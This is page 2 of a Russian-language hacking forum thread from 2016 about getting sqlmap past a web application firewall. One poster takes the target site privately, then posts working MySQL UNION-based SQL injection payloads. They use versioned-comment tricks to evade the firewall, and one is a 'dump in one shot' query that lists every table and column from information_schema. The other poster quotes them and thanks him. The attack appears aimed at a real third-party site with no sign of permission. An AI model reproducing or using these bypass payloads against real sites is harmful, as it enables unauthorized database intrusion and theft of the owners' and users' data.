HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Sqlmap + waf
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 05.05.2016, 11:32
OSW
Участник форума
Регистрация: 12.07.2007
Сообщений: 139
Провел на форуме:
623391

Репутация: 33
Отправить сообщение для OSW с помощью ICQ
По умолчанию
Цитата:
Сообщение от SooLFaa  
SooLFaa said:

Я так понимаю, что СУБД MySQL?
Да, забыл указать сразу.
 
Ответить с цитированием

  #12  
Старый 05.05.2016, 11:43
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию
Цитата:
Сообщение от OSW  
OSW said:

Да, забыл указать сразу.
Скинь в лс таргет, после работы попробуем покрутить.
 
Ответить с цитированием

  #13  
Старый 05.05.2016, 13:55
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию
Во - первых, неправильно определил вектор. Здесь самый обычный UNION (ну есессно если есть юнион бэйсед есть и блайнд, никто не спорит). Тоже касается и payload для waf bypass.

Валидный запрос в твоем случае выглядет так:

../news/0'+/*!12345UnIon*/+select+1,2,(Select+Table_Name+From+/*!information_schema*/.Tables+limit+1,1),4,5,6,7,8,9,0+--+'(/

DIOS.

..news/0'+/*!12345UnIon*/+select+1,2,(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=ex port_set(5,export_set(5,@,table_name,0x3c6c693e,2) ,column_name,0xa3a,2)),@,2)) ,4,5,6,7,8,9,0+--+'(/

И всё проще без sqlmap. Валидную ссылку отправил в лс.
 
Ответить с цитированием

  #14  
Старый 05.05.2016, 15:19
OSW
Участник форума
Регистрация: 12.07.2007
Сообщений: 139
Провел на форуме:
623391

Репутация: 33
Отправить сообщение для OSW с помощью ICQ
По умолчанию
Цитата:
Сообщение от SooLFaa  
SooLFaa said:

Во - первых, неправильно определил вектор. Здесь самый обычный UNION (ну есессно если есть юнион бэйсед есть и блайнд, никто не спорит). Тоже касается и payload для waf bypass.
Валидный запрос в твоем случае выглядет так:
../news/0'+/*!12345UnIon*/+select+1,2,(Select+Table_Name+From+/*!information_schema*/.Tables+limit+1,1),4,5,6,7,8,9,0+--+'(/
DIOS.
..news/0'+/*!12345UnIon*/+select+1,2,(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=ex port_set(5,export_set(5,@,table_name,0x3c6c693e,2) ,column_name,0xa3a,2)),@,2)) ,4,5,6,7,8,9,0+--+'(/
И всё проще без sqlmap. Валидную ссылку отправил в лс.
Мегареспектище!

Курю, где был не прав.
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ